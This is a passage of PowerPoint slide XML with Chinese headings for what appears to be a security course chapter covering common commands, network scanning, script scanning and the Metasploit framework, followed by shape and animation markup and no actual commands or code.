        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
